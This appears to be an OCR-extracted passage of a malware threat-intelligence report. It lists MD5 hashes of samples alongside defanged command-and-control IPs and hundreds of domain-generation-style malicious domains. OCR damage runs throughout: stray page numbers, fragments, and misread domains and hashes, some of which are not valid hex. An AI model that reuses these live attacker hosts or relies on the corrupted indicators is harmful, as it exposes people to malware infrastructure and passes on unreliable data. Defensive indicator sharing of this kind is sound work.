a991a02b269a038ff691b60cb8d23708 


1125cab12accbfd9632bdb8cd3d50742 
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Once executed a sample malware (MD5: 
7969e4ef1b2fece87b806b5dfe25a3bb) phones back to the following C &C 
server IPs: 


hxxp://23.227.163.110 


Related malicious MD5s, known, to, 
have, phoned, back, to, the, same, malicious, C &C, server IP: 


MD5: b6albab3fba59504f837498719ce6e4c 


MD5: ed646bbbace5bc21ea177elec740eb13 


MD5: 1125cab12accbfd9632bdb8cd3d50742 


MD5: 9cflldee06d875a713348296d6482d31 


MD5: 0413ed5dfe30b8a326b979506d224258 
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Known to have responded to the same 
malicious C &C server IPs (market155.ru - 81.94.205.227; 
31.31.204.59), are, also, the, following, malicious, domains: 


hxxp://volga18.ru 


hxxp://dommmsc.ru 


hxxp://droid175.ru 


hxxp://market155.ru 


hxxp://43tywer.ru 


hxxp://42qtes.ru 


hxxp://41warter.ru 


hxxp://zappylessy.ru 


hxxp://myrevansh.ru 
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hxxp://slon404.ru 


hxxp://defmusic4.ru 


hxxp://imail15.ru 


hxxp://mrkt-applications.xyz 


hxxp://wrkme2.ru 


hxxp://youtri.ru 


hxxp://market155.ru 


hxxp://bascetcom4.ru 


Related malicious MD5s known to have 
phoned back to the same C &C server IPs (81.94.205.227): 


5140 


MD5: 4ed28716716a7f6dc9f6ad1526512b26 


Once executed a sample malware 
phones back to the following C &C server IPs: 


hxxp://192.227.137.154/request.php 


hxxp://23.227.163.110/locker.php 


Related malicious MD5s known to have 
phoned back to the same C &C server IPs (31.31.204.59): 


MD5: e683af18e47c4441d5077e827c902e9e 
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Once executed a sample malware (MD5: 
e683af18e47c4441d5077e827c902e9e) phones back to the following C &C 
server IPs: 


208.100.26.234 


195.22.28.199 


208.100.26.234 


98.124.243.46 


109.94.1.133 


216.239.36.21 


208.100.26.234 


195.22.26.248 


208.73.211.70 
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162.242.249.192 


157.7.107.29 


50.62.91.212 


50.62.150.186 


98.124.243.44 


200.29.217.151 


212.83.129.135 


141.8.192.44 


192.232.216.164 


178.170.164.188 


114.200.196.31 
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69.172.201.153 


182.162.95.55 


216.104.165.91 


195.22.28.197 


112.124.104.218 


98.124.243.31 


31.31.204.59 


184.168.221.63 


50.63.202.56 


97.74.22.1 
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52.76.64.5 


5.79.71.226 


98.124.243.32 


144.48.5.153 


184.168.221.3 


98.124.243.43 


167.114.213.199 


185.62.206.64 


216.35.197.43 


69.64.76.61 


64.98.145.30 
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109.206.190.54 


66.96.160.194 


8.5.1.38 


103.11.229.100 


Once executed a sample malware (MD5: 
e683af18e47c4441d5077e827c902e9e) phones back to the following C &C 
server IPs: 


hxxp://riddenstorm.net 


hxxp://lordofthepings.ru 


hxxp://learnthrew.net 


hxxp://learncross.net 
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hxxp://senseshade.ru 


hxxp://sensecross.net 


hxxp://senseshade.net 


hxxp://learnshade.net 


hxxp://sensefloor.net 


hxxp://learnfloor.net 


hxxp://torethrew.net 


hxxp://fallthrew.ru 


hxxp://waitcross.ru 


hxxp://fallcross.net 
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hxxp://weekfloor.net 


hxxp://muchshade.net 


hxxp://torefloor.net 


hxxp://veryshade.net 


hxxp://fallthrew.net 


hxxp://fallfloor.net 


hxxp://muchshade.ru 


hxxp://muchthrew.net 


hxxp://torecross.net 


hxxp://piecefloor.net 


hxxp://muchfloor.net 
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hxxp://pieceshade.net 


hxxp://piececross.net 


hxxp://veryfloor.net 


hxxp://verythrew.net 


hxxp://toreshade.net 


hxxp://weekshade.net 


hxxp://verycross.net 


hxxp://waitthrew.net 


hxxp://fallshade.net 


hxxp://muchcross.net 
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hxxp://takethrew.net 


hxxp://weekcross.net 


hxxp://weekthrew.net 


hxxp://torefloor.ru 


hxxp://piecethrew.net 


hxxp://verycross.ru 


hxxp://piecethrew.ru 


hxxp://waitcross.net 


hxxp://takecross.net 


hxxp://waitshade.net 


hxxp://takeshade.net 
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hxxp://triesteach.net 


hxxp://triesteach.ru 


hxxp://yourcould.net 


hxxp://triescould.net 


hxxp://yourusual.net 


hxxp://triesusual.net 


hxxp://takefloor.net 


hxxp://takefloor.ru 


hxxp://waitfloor.net 


hxxp://yourteach.net 
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hxxp://triesgrave.net 


hxxp://yourgrave.net 


hxxp://Irstnusual.net 


hxxp://viewusual.ru 


hxxp://viewusual.net 


hxxp://Irstncould.net 


hxxp://viewcould.net 


hxxp://Irstnteach.net 


hxxp://Irstngrave.ru 


hxxp://viewteach.net 


hxxp://Irstngrave.net 
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hxxp://viewgrave.net 


hxxp://fillcould.ru 


hxxp://plantusual.net 


hxxp://fillusual.net 


hxxp://fillcould.net 


hxxp://plantcould.net 


hxxp://fillteach.net 


hxxp://plantgrave.net 


hxxp://senseusual.ru 


hxxp://senseusual.net 
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hxxp://plantteach.net 


hxxp://fillgrave.net 


hxxp://learnusual.net 


hxxp://sensecould.net 


hxxp://learncould.net 


hxxp://learnteach.ru 


hxxp://senseteach.net 


hxxp://learnteach.net 


hxxp://sensegrave.net 


hxxp://learngrave.net 


hxxp://toreusual.net 
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hxxp://fallusual.net 


hxxp://fallgrave.net 


hxxp://toregrave.net 


hxxp://fallteach.net 


hxxp://toreteach.net 


hxxp://fallcould.net 


hxxp://torecould.net 


hxxp://torecould.ru 


hxxp://weekusual.net 


hxxp://fallgrave.ru 


ayo hs! 


hxxp://veryusual.net 


hxxp://verycould.net 


hxxp://weekteach.ru 


hxxp://weekteach.net 


hxxp://weekcould.net 


hxxp://veryteach.net 


hxxp://weekgrave.net 


hxxp://verygrave.net 


hxxp://pieceusual.net 


hxxp://muchusual.ru 


hxxp://muchusual.net 
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hxxp://piececould.net 


hxxp://muchcould.net 


hxxp://pieceteach.net 


hxxp://muchteach.net 


hxxp://piecegrave.ru 


hxxp://muchgrave.net 


hxxp://waitusual.net 


hxxp://takeusual.net 


hxxp://waitcould.net 


hxxp://piecegrave.net 
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hxxp://takecould.ru 


hxxp://takecould.net 


hxxp://waitteach.net 


hxxp://taketeach.net 


hxxp://waitgrave.net 


hxxp://takegrave.net 


hxxp://triesstate.ru 


hxxp://triesstate.net 


hxxp://yourstate.net 


hxxp://triesbroke.net 


hxxp://yourbroke.net 
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hxxp://Irstnbroke.net 


hxxp://Irstnbroke.ru 


hxxp://viewstate.net 


hxxp://Irstnstate.net 


hxxp://yournews.net 


hxxp://triesnews.net 


hxxp://yourmark.net 


hxxp://yourmark.ru 


hxxp://triesmark.net 


hxxp://viewbroke.net 


abo) 


hxxp://Irstnmark.net 


hxxp://viewmark.net 


hxxp://Irstnnews.net 


hxxp://viewnews.ru 


hxxp://viewnews.net 


hxxp://fillstate.net 


hxxp://plantbroke.net 


hxxp://fillbroke.net 


hxxp://plantstate.net 


hxxp://plantmark.ru 


hxxp://plantmark.net 
5160 


hxxp://fillmark.net 


hxxp://fillnews.net 


hxxp://sensestate.net 


hxxp://plantnews.net 


hxxp://learnstate.ru 


hxxp://sensebroke.net 


hxxp://learnstate.net 


hxxp://learnbroke.net 


hxxp://learnmark.net 


hxxp://sensemark.net 


5161 


hxxp://sensenews.ru 


hxxp://sensenews.net 


hxxp://learnnews.net 


hxxp://torestate.net 


hxxp://fallstate.net 


hxxp://torebroke.net 


hxxp://fallobroke.ru 


hxxp://falloroke.net 


hxxp://toremark.net 


hxxp://fallmark.net 


hxxp://torenews.net 
5162 


hxxp://weekstate.ru 


hxxp://fallnews.net 


hxxp://weekstate.net 


hxxp://verystate.net 


hxxp://weekbroke.net 


hxxp://verybroke.net 


hxxp://weekmark.net 


hxxp://verymark.ru 


hxxp://piecestate.net 


hxxp://muchstate.net 


5163 


hxxp://verynews.net 


hxxp://weeknews.net 


hxxp://verymark.net 


hxxp://piecebroke.ru 


hxxp://piecebroke.net 


hxxp://muchbroke.net 


hxxp://piecemark.net 


hxxp://muchmark.net 


hxxp://piecenews.net 


hxxp://muchnews.ru 


hxxp://muchnews.net 
5164 


hxxp://waitstate.net 


hxxp://waitbroke.net 


hxxp://takebroke.net 


hxxp://waitmark.ru 


hxxp://waitmark.net 


hxxp://takestate.net 


hxxp://takemark.net 


hxxp://waitnews.net 


hxxp://takenews.net 


hxxp://triesthan.net 


5165 


hxxp://yourthan.ru 


hxxp://yourthan.net 


hxxp://triesread.net 


hxxp://yourread.net 


hxxp://yourmile.net 


hxxp://triesking.ru 


hxxp://triesmile.net 


hxxp://triesking.net 


hxxp://yourking.net 


hxxp://Irstnthan.net 


hxxp://viewthan.net 
5166 


hxxp://Irstnread.net 


hxxp://viewread.ru 


hxxp://Irstnmile.net 


hxxp://viewread.net 


hxxp://viewmile.net 


hxxp://Irstnking.net 


hxxp://viewking.net 


hxxp://plantthan.ru 


hxxp://plantthan.net 


hxxp://fillthan.net 


5167 


hxxp://plantread.net 


hxxp://fillread.net 


hxxp://plantking.net 


hxxp://fillmile.net 


hxxp://fillmile.ru 


hxxp://plantmile.net 


hxxp://fillking.net 


hxxp://sensethan.net 


hxxp://learnthan.net 


hxxp://senseread.ru 


hxxp://senseread.net 
5168 


hxxp://learnread.net 


hxxp://sensemile.net 


hxxp://learnmile.net 


hxxp://senseking.net 


hxxp://learnking.ru 


hxxp://learnking.net 


hxxp://torethan.net 


hxxp://fallthan.net 


hxxp://toreread.net 


hxxp://fallread.net 


5169 


hxxp://toremile.net 


hxxp://toremile.ru 


hxxp://toreking.net 


hxxp://fallking.net 


hxxp://fallmile.net 


hxxp://weekthan.net 


hxxp://verythan.ru 


hxxp://verythan.net 


hxxp://weekread.net 


hxxp://veryread.net 


hxxp://weekmile.net 
5170 


hxxp://verymile.net 


hxxp://weekking.net 


hxxp://weekking.ru 


hxxp://veryking.net 


hxxp://piecethan.net 


hxxp://muchthan.net 


hxxp://pieceread.net 


hxxp://muchread.ru 


hxxp://muchread.net 


hxxp://piecemile.net 


5171 


hxxp://muchmile.net 


hxxp://pieceking.net 


hxxp://muchking.net 


hxxp://waitthan.ru 


hxxp://waitthan.net 


hxxp://takethan.net 


hxxp://waitread.net 


hxxp://waitmile.net 


hxxp://takeread.net 


hxxp://takemile.ru 


hxxp://takemile.net 
5172 


hxxp://waitking.net 


hxxp://takeking.net 


hxxp://triessaturday.net 


hxxp://triesthousand.net 


hxxp://yourthousand.net 


hxxp://yoursaturday.net 


hxxp://triesthousand.ru 


hxxp://triesloud.net 


hxxp://yourloud.net 


hxxp://triestree.net 


5173 


hxxp://yourtree.ru 


hxxp://yourtree.net 


hxxp://Irstnsaturday.net 


hxxp://viewsaturday.net 


hxxp://Irstnthousand.net 


hxxp://viewthousand.net 


hxxp://Irstnloud.ru 


hxxp://Irstnloud.net 


hxxp://viewloud.net 


hxxp://viewtree.net 


hxxp://Irstntree.net 
5174 


hxxp://fillsaturday.ru 


hxxp://plantsaturday.net 


hxxp://fillsaturday.net 


hxxp://plantthousand.net 


hxxp://fillthousand.net 


hxxp://plantloud.net 


hxxp://fillloud.net 


hxxp://planttree.ru 


hxxp://planttree.net 


hxxp://filltree.net 


5175 


hxxp://sensesaturday.net 


hxxp://learnsaturday.net 


hxxp://sensethousand.net 


hxxp://learnthousand.ru 


hxxp://learnthousand.net 


hxxp://senseloud.net 


hxxp://learnloud.net 


hxxp://sensetree.net 


hxxp://learntree.net 


hxxp://toresaturday.ru 


hxxp://toresaturday.net 
5176 


hxxp://fallsaturday.net 


hxxp://torethousand.net 


hxxp://fallthousand.net 


hxxp://toreloud.net 


hxxp://fallloud.ru 


hxxp://fallloud.net 


hxxp://toretree.net 


hxxp://falltree.net 


hxxp://weeksaturday.net 


hxxp://verysaturday.net 


5177 


hxxp://weekthousand.ru 


hxxp://weekthousand.net 


hxxp://verythousand.net 


hxxp://weekloud.net 


hxxp://veryloud.net 


hxxp://weektree.net 


hxxp://verytree.ru 


hxxp://verytree.net 


hxxp://piecesaturday.net 


hxxp://muchsaturday.net 


hxxp://piecethousand.net 
5178 


hxxp://muchthousand.net 


hxxp://pieceloud.ru 


hxxp://pieceloud.net 


hxxp://muchtree.net 


hxxp://piecetree.net 


hxxp://muchloud.net 


hxxp://waitsaturday.net 


hxxp://takesaturday.ru 


hxxp://takesaturday.net 


hxxp://waitthousand.net 


5179 


hxxp://takethousand.net 


hxxp://takeloud.net 


hxxp://waitloud.net 


hxxp://waittree.ru 


hxxp://waittree.net 


hxxp://taketree.net 


hxxp://triesstock.net 


hxxp://yourstock.net 


hxxp://triesthrow.net 


hxxp://yourthrow.ru 


hxxp://yourthrow.net 
5180 


hxxp://triesreply.net 


hxxp://yourreply.net 


hxxp://trieswhole.net 


hxxp://yourwhole.net 


hxxp://Irstnstock.net 


hxxp://viewstock.net 


hxxp://Irstnstock.ru 


hxxp://Irstnthrow.net 


hxxp://viewthrow.net 


hxxp://Irstnreply.net 


5181 


hxxp://viewreply.ru 


hxxp://viewreply.net 


hxxp://Irstnwhole.net 


hxxp://viewwhole.net 


hxxp://plantstock.net 


hxxp://fillstock.net 


hxxp://plantthrow.net 


hxxp://plantthrow.ru 


hxxp://fillthrow.net 


hxxp://plantreply.net 


hxxp://fillreply.net 
5182 


hxxp://plantwhole.net 


hxxp://fillwhole.ru 


hxxp://fillwhole.net 


hxxp://sensestock.net 


hxxp://learnstock.net 


hxxp://sensethrow.net 


hxxp://learnthrow.net 


hxxp://sensereply.ru 


hxxp://sensereply.net 


hxxp://learnreply.net 


5183 


hxxp://sensewhole.net 


hxxp://fallstock.net 


hxxp://fallstock.ru 


hxxp://torestock.net 


hxxp://learnwhole.net 


hxxp://fallreply.net 


hxxp://torereply.net 


hxxp://fallthrow.net 


hxxp://torethrow.net 


hxxp://torewhole.ru 


hxxp://fallwhole.net 
5184 


hxxp://torewhole.net 


hxxp://weekstock.net 


hxxp://verystock.net 


hxxp://weekthrow.net 


hxxp://verythrow.net 


hxxp://verythrow.ru 


hxxp://weekreply.net 


hxxp://weekwhole.net 


hxxp://veryreply.net 


hxxp://verywhole.net 


5185 


hxxp://piecestock.ru 


hxxp://piecestock.net 


hxxp://muchstock.net 


hxxp://piecethrow.net 


hxxp://muchthrow.net 


hxxp://piecereply.net 


hxxp://muchreply.ru 


hxxp://muchreply.net 


hxxp://piecewhole.net 


hxxp://muchwhole.net 


hxxp://waitstock.net 
5186 


hxxp://takestock.net 


hxxp://waitthrow.ru 


hxxp://waitthrow.net 


hxxp://takethrow.net 


hxxp://waitreply.net 


hxxp://takereply.net 


hxxp://takewhole.ru 


hxxp://waitwhole.net 


hxxp://triescold.net 


hxxp://takewhole.net 


5187 


hxxp://yourcold.net 


hxxp://trieswrote.net 


hxxp://triesbone.net 


hxxp://yourbone.net 


hxxp://triesbone.ru 


hxxp://yourwrote.net 


hxxp://triesfire.net 


hxxp://yourfire.net 


hxxp://Irstncold.net 


hxxp://viewcold.net 


hxxp://viewcold.ru 
5188 


hxxp://Irstnwrote.net 


hxxp://Irstnbone.net 


hxxp://viewwrote.net 


hxxp://viewbone.net 


hxxp://Irstnfire.ru 


hxxp://viewfire.net 


hxxp://Irstnfire.net 


hxxp://plantcold.net 


hxxp://fillcold.net 


hxxp://plantwrote.net 


5189 


hxxp://fillwrote.ru 


hxxp://plantbone.net 


hxxp://fillwrote.net 


hxxp://fillbone.net 


hxxp://plantfire.net 


hxxp://fillfire.net 


hxxp://sensecold.ru 


hxxp://sensecold.net 


hxxp://learncold.net 


hxxp://sensewrote.net 


hxxp://learnwrote.net 
5190 


hxxp://sensebone.net 


hxxp://learnbone.ru 


hxxp://learnbone.net 


hxxp://sensefire.net 


hxxp://learnfire.net 


hxxp://torecold.net 


hxxp://fallcold.net 


hxxp://torewrote.ru 


hxxp://torewrote.net 


hxxp://fallwrote.net 


5191 


hxxp://fallbone.net 


hxxp://fallfire.ru 


hxxp://torefire.net 


hxxp://torebone.net 


hxxp://fallfire.net 


hxxp://weekcold.net 


hxxp://weekwrote.net 


hxxp://verycold.net 


hxxp://verywrote.net 


hxxp://weekbone.net 


hxxp://weekbone.ru 
5192 


hxxp://weekfire.net 


hxxp://verybone.net 


hxxp://veryfire.net 


hxxp://piececold.net 


hxxp://muchcold.net 


hxxp://muchcold.ru 


hxxp://piecewrote.net 


hxxp://muchwrote.net 


hxxp://piecebone.net 


hxxp://muchbone.net 


5193 


hxxp://piecefire.ru 


hxxp://piecefire.net 


hxxp://muchfire.net 


hxxp://waitcold.net 


hxxp://takecold.net 


hxxp://waitwrote.net 


hxxp://takewrote.ru 


hxxp://takewrote.net 


hxxp://waitbone.net 


hxxp://takebone.net 


hxxp://waitfire.net 
5194 


hxxp://takefire.net 


hxxp://longride.ru 


hxxp://longride.net 


hxxp://soilride.net 


hxxp://longsmall.net 


hxxp://soilsmall.net 


hxxp://longought.net 


hxxp://soilought.ru 


hxxp://soilought.net 


hxxp://longmarry.net 


5195 


hxxp://soilmarry.net 


hxxp://wheelsmall.ru 


hxxp://wheelride.net 


hxxp://saidride.net 


hxxp://wheelsmall.net 


hxxp://saidsmall.net 


hxxp://wheelought.net 


hxxp://saidought.net 


hxxp://wheelmarry.net 


hxxp://saidmarry.net 


hxxp://saidmarry.ru 
5196 


hxxp://ballride.net 


hxxp://stickride.net 


hxxp://sticksmall.net 


hxxp://ballsmall.net 


hxxp://stickought.net 


hxxp://stickought.ru 


hxxp://ballought.net 


hxxp://stickmarry.net 


hxxp://ballmarry.net 


hxxp://enemyride.net 


5197 


hxxp://liferide.ru 


hxxp://liferide.net 


hxxp://enemysmall.net 


hxxp://lifesmall.net 


hxxp://enemyought.net 


hxxp://lifeought.net 


hxxp://enemymarry.ru 


hxxp://enemymarry.net 


hxxp://lifemarry.net 


hxxp://mouthride.net 


hxxp://tillride.net 
5198 


hxxp://mouthsmall.net 


hxxp://tillsmall.ru 


hxxp://tillsmall.net 


hxxp://mouthought.net 


hxxp://tillought.net 


hxxp://mouthmarry.net 


hxxp://tillmarry.net 


hxxp://shallride.ru 


hxxp://shallride.net 


hxxp://deepride.net 


5199 


hxxp://shallsmall.net 


hxxp://deepsmall.net 


hxxp://shallought.net 


hxxp://deepought.ru 


hxxp://deepought.net 


hxxp://shallmarry.net 


hxxp://deepmarry.net 


hxxp://pushride.net 


hxxp://pushsmall.ru 


hxxp://fridayride.net 


hxxp://pushsmall.net 
5200 


hxxp://fridaysmall.net 


hxxp://pushought.net 


hxxp://pushmarry.net 


hxxp://fridayought.net 


hxxp://fridaymarry.ru 


hxxp://fridaymarry.net 


hxxp://alongride.net 


hxxp://alongsmall.net 


hxxp://decemberride.net 


hxxp://decembersmall.net 


5201 


hxxp://alongought.ru 


hxxp://alongought.net 


hxxp://decemberought.net 


hxxp://alongmarry.net 


hxxp://decembermarry.net 


hxxp://longthem.net 


hxxp://soilthem.ru 


hxxp://soilthem.net 


hxxp://longbest.net 


hxxp://soilbest.net 


hxxp://longconsiderable.net 
5202 


hxxp://soilconsiderable.net 


hxxp://longeasy.ru 


hxxp://longeasy.net 


hxxp://soileasy.net 


hxxp://wheelthem.net 


hxxp://saidthem.net 


hxxp://wheelbest.net 


hxxp://saidbest.ru 


hxxp://saidbest.net 


hxxp://wheelconsiderable.net 


5203 


hxxp://saidconsiderable.net 


hxxp://wheeleasy.net 


hxxp://saideasy.net 


hxxp://stickthem.ru 


hxxp://stickthem.net 


hxxp://ballthem.net 


hxxp://stickbest.net 


hxxp://ballbest.net 


hxxp://stickconsiderable.net 


hxxp://ballconsiderable.ru 


hxxp://ballconsiderable.net 
5204 


hxxp://stickeasy.net 


hxxp://balleasy.net 


hxxp://enemythem.net 


Known to have phoned back to the 
same malicious C &C server IPs (illuminatework.ru - 81.94.205.228; 
31.31.204.59), are, also, the, following, malicious, MD5s: 


MD5: 04c8e24f19308bd92e0bcdb6f02e8b4e 


MD5: ca2747377512d13afb9a4a7f21fda0fc 


MD5: 79e2b3abdbf33552677660069f891b88 


5205 


Once executed a sample malware 
(MD5:79e2b3abdbf33552677660069f891b88) phones back to the following 
malicious C &C server IPs: 


hxxp://23.227.163.110 


Related malicious MD5s known to have 
phoned back to the same malicious C &C server IPs 
(illuminatework.ru - 81.94.205.228; 31.31.204.59): 


MD5: e683af18e47c4441d5077e827c902e9e 


MD5: a0c825e870f5f882cb25765151d10450 


MD5: 2ce7dc2e46216887c42ba52ab3de422d 


MD5: bb9dd2c44be5e2b6bc99b0cf2d1fccel 


MD5: dba5578c7271d6759ba3283a030eda33 


5206 


Related malicious MD5s known to have 
phoned back to the same C &C server IPs (leeroywork3.co - 
81.94.205.228; 198.54.117.210): 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


754fbdc3d2f2133d1922e3edae033637 


be4432facc4a67acf102715a9baadbec 


42524e4cd01f1e92151e4221cb727d4e 


5abb2cc25bb3e53e7427bc9bbdc898ab 


b05409a33f1409ef48e4cdbe29480edf 


Once executed, a, sample, malware 


(MD5: 754fbdc3d2f2133d1922e3edae033637), phones, back, to, the, 


following, C &C, server, IPs: 


5207 


hxxp://bonezyard.003.co - 
198.54.117.210 


Once executed, a, sample, malware 
(MD5: be4432facc4a67acf102715a9baadbec), phones, back, to, the, 
following, C &C, server, IPs: 


hxxp://cidihifu.info 


hxxp://sirabyso.info 


hxxp://cinydota.info 


hxxp://dixoxywy.info 


hxxp://viherami.info 


hxxp://dosujuba.info 


hxxp://bowomacy.info 
5208 


hxxp://fobefizi.info 


hxxp://bozuceko.info 


hxxp://ohopihe.info 


hxxp://naselyfu.info 


hxxp://gaquqoso.info 


hxxp://mavagyte.info 


hxxp://halybowu. info 


hxxp://magisumi.info 


hxxp://jepazana.info 


hxxp://qeqywuvy.info 


5209 


hxxp://jevijexi.info 


hxxp://wekanila.info 


hxxp://kefydeje.info 


hxxp://wyticogu.info 


hxxp://lymetydo. info 


hxxp://rycukope.info 


hxxp://lykomuru.info 


hxxp://tyfegaqo.info 


hxxp://zuruvuna.info 


hxxp://tunopavy.info 


hxxp://xuxelixi.info 
5210 


hxxp://pujuwela.info 


hxxp://xudohijy.info 


hxxp://sirybyhi.info 


hxxp://cinidofo.info 


hxxp://sizaxyse.info 


hxxp://vihyratu.info 


hxxp://disijuwo.info 


hxxp://vowamame. info 


hxxp://fobyfiby.info 


hxxp://boziceci.info 


5211 


hxxp://fohatiza.info 


hxxp://nopuleky.info 


hxxp://gaqoqohi.info 


hxxp://navegyfa.info 


hxxp://halubose.info 


hxxp://magosutu.info 


hxxp://hapezawo.info 


hxxp://jecojenu.info 


hxxp://qekenivo.info 


hxxp://qequwuge. info 


hxxp://kefidexa.info 
5212 


hxxp://wetaxoly.info 


hxxp://kymytyji.info 


hxxp://rycikoga.info 


hxxp://lykamydy.info 


hxxp://rydygapu.info 


hxxp://zyrivuro.info 


hxxp://tunapaqe.info 


hxxp://zuxylinu.info 


hxxp://pujowevo.info 


hxxp://xudehixe.info 


5213 


hxxp://purubyly.info 


hxxp://cibosoki.info 


hxxp://sizexyha.info 


hxxp://cihurafy.info 


hxxp://disojusi.info 


hxxp://viwemata. info 


hxxp://dobufuwe. info 


hxxp://bozacemu.info 


hxxp://fogytibo.info 


hxxp://bopilece.info 


hxxp://goqaqozu.info 
5214 


hxxp://navygyki.info 


hxxp://galivoha.info 


hxxp://magasufy.info 


hxxp://hapyzasi.info 


hxxp://mamiwuta.info 


hxxp://jecejery.info 


hxxp://qekuniqu.info 


hxxp://jefodeno.info 


hxxp://wetexive.info 


hxxp://kemutyxu.info 


5215 


hxxp://wycokolo.info 


hxxp://lyjemyje.info 


hxxp://rydufagy.info 


hxxp://lyrovudi.info 


hxxp://tynypapa.info 


hxxp://zuxiliry.info 


hxxp://tujawegqi.info 


hxxp://xudyhino.info 


hxxp://puwibyve.info 


hxxp://xubasoxu. info 


hxxp://sizyxyzo.info 
5216 


hxxp://cihiroke.info 


hxxp://sisajuhu.info 


hxxp://viwunafi.info 


hxxp://dibofusa.info 


hxxp://volecety.info 


hxxp://fogutiwi.info 


hxxp://bopolema.info 


hxxp://foqeqgoby.info 


hxxp://novugycu.info 


hxxp://galovozo.info 


5217 


hxxp://nagesuke.info 


hxxp://hatizahu.info 


hxxp://mamawufo. info 


hxxp://hacyhasa.info 


hxxp://qekinipy.info 


hxxp://jefaderi.info 


hxxp://qetyxiga.info 


hxxp://kemityny.info 


hxxp://wexakovi.info 


hxxp://kyjymyxo.info 


hxxp://rydofale.info 
5218 


hxxp://lyrevuju.info 


hxxp://rynupago.info 


hxxp://zyxolide.info 


hxxp://tujeqepu.info 


hxxp://zusuhiri.info 


hxxp://puwobeqa.info 


hxxp://xubesony.info 


hxxp://puzuxyvi.info 


hxxp://ciharoca.info 


hxxp://sisyjuze.info 


5219 


hxxp://ciwinaku.info 


hxxp://divafuho.info 


hxxp://vilycefe.info 


hxxp://dogitisu.info 


hxxp://bopaketo.info 


hxxp://foqyqowa.info 


hxxp://nafusyca.info 


hxxp://gatozazy.info 


hxxp://mamewuki.info 


hxxp://hacuhaho.info 


hxxp://makonife.info 
5220 


hxxp://bovigymy.info 


hxxp://golevobi.info 


hxxp://jefededu.info 


hxxp://qetuxipo.info 


hxxp://jenoryre.info 


hxxp://kejimyni.info 


hxxp://wexykoqy.info 


hxxp://wydafava.info 


hxxp://lyryvuxy.info 


hxxp://rynipali.info 


5221 


hxxp://lyxaluja.info 


hxxp://tyhyqege.info 


hxxp://zusihidu.info 


hxxp://tuwabepo.info 


hxxp://xubusore.info 


hxxp://puzozyqu.info 


hxxp://xuherono.info 


hxxp://sisujuba.info 


hxxp://ciqonacy.info 


hxxp://sivefuzi.info 


hxxp://viluceka.info 
5222 


hxxp://digotihy.info 


hxxp://vopekefu.info 


hxxp://fogiqiso.info 


hxxp://bovagyte.info 


hxxp://fokyvowu. info 


hxxp://nofipymo.info 


hxxp://gatazabe.info 


hxxp://namywucy.info 


hxxp://hacihazi.info 
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hxxp://qeroxigi.info 


hxxp://jeneryda.info 
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hxxp://zysahijy.info 
5224 


hxxp://tuwybegi.info 
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hxxp://bofopyti.info 
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hxxp://hadodeba. info 
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hxxp://qexojolo.info 
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5229 


hxxp://qedufogu.info 
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hxxp://webypapa.info 


hxxp://kyzilury.info 


hxxp://ryhaqeqi.info 
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hxxp://zybasixi.info 


hxxp://tulyzylo.info 
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5231 


hxxp://citokema.info 
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hxxp://wyheqapu. info 
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hxxp://rywobeqe.info 
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hxxp://puvaduga.info 


5233 


hxxp://xulyxade.info 


hxxp://sifitisu.info 


hxxp://citaketo.info 


hxxp://simymiwe.info 
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hxxp://dikevobi.info 


hxxp://vofupyca.info 


hxxp://fotolozy.info 
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5234 
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hxxp://naruxito.info 


hxxp://hanarewe.info 


hxxp://maxyjomu.info 


hxxp://hahimybo.info 
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hxxp://qebitali.info 


hxxp://kezaluja.info 


hxxp://wehyqagy.info 


5235 


hxxp://kysigidi.info 


hxxp://ryqevepo. info 


hxxp://lyvusire.info 


hxxp://rylozyqu.info 


hxxp://zygewono. info 


hxxp://tupujyve.info 
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hxxp://puveduli.info 
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hxxp://cicafety. info 


hxxp://dikyvowu.info 


hxxp://vifipymo.info 


hxxp://doralobe.info 


hxxp://bonywucu.info 


hxxp://foxihazo.info 


hxxp://bojabuka.info 


hxxp://godusehy.info 


hxxp://naroxifi.info 
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hxxp://ganeresa.info 


hxxp://mazujity.info 


hxxp://hahonywi.info 


hxxp://masefomo.info 


hxxp://jewucyne.info 


hxxp://qebotavu.info 


hxxp://jezeluxo.info 


hxxp://wehigqale.info 


hxxp://kepagiju.info 


hxxp://wyqyvegi.info 


hxxp://lyvisida.info 
5238 


hxxp://rylazypy.info 


hxxp://lygywori.info 


hxxp://typihyqa.info 


hxxp://zuqanone. info 


hxxp://tucyduvu. info 


hxxp://xukoxaxo.info 


hxxp://pufetule.info 


hxxp://xutukeju.info 


hxxp://simomiho.info 


hxxp://cicefefa.info 
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hxxp://sikuvosy.info 


hxxp://vidopyti.info 


hxxp://direlowa.info 


hxxp://vonuqumy.info 


hxxp://foxahabi.info 


hxxp://bojybuco.info 


hxxp://fodisaze.info 


hxxp://noraxiku.info 


hxxp://gabyreho.info 


hxxp://nazijife.info 
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5240 


hxxp://masyfoti.info 


hxxp://hawicywa.info 


hxxp://qebetaqy.info 


hxxp://jezukuni.info 


hxxp://qegoqava.info 


hxxp://kepegixe.info 


hxxp://wequvelu.info 


hxxp://kyvosijo.info 


hxxp://rylezege.info 


hxxp://lyguwodu. info 


5241 


hxxp://rypohypo.info 


hxxp://zymynora.info 


hxxp://tuciduqy.info 


hxxp://zukaxani.info 


hxxp://pufyruva.info 


hxxp://xutikexy.info 


hxxp://pumamilu.info 


hxxp://cicyfeko.info 


hxxp://sijivohe.info 


hxxp://cidapyfu.info 


hxxp://diruloso.info 
5242 


hxxp://vinoqyte.info 


hxxp://doxehawy.info 


hxxp://bojubumi.info 


hxxp://fodosaba.info 


hxxp://bowezicy.info 


hxxp://goburezi.info 


hxxp://nazojika.info 


hxxp://gahenyhe.info 


hxxp://masifofu.info 


hxxp://hawacyso.info 


5243 


hxxp://mabytate.info 


hxxp://jelikuru.info 


hxxp://qegaqaqi.info 


hxxp://jepyguna.info 


hxxp://weqivevy.info 


hxxp://kevapixi.info 


hxxp://wylyzela.info 


hxxp://lygowojy.info 


hxxp://rytehygu.info 


hxxp://lymunodo.info 


hxxp://tufuruqo.info 
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hxxp://zukexaru.info 


hxxp://tycodupe.info 


hxxp://xutokene. info 


hxxp://pumemivy.info 


hxxp://xuxufexi.info 
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hxxp://sirilohi.info 


hxxp://vinaqyfo.info 


hxxp://dixyhase.info 


5245 


hxxp://vojibutu.info 


hxxp://fosasawo.info 


hxxp://bowyzime.info 


hxxp://fobirebu.info 


hxxp://nozejici.info 


hxxp://gahunyza.info 


hxxp://nasodoky.info 


hxxp://hawecyhi.info 


hxxp://mavutofa.info 


hxxp://halokusy.info 


hxxp://qegeqapu.info 
5246 


hxxp://jepuguro.info 


hxxp://qeqovege.info 


hxxp://kevypinu.info 


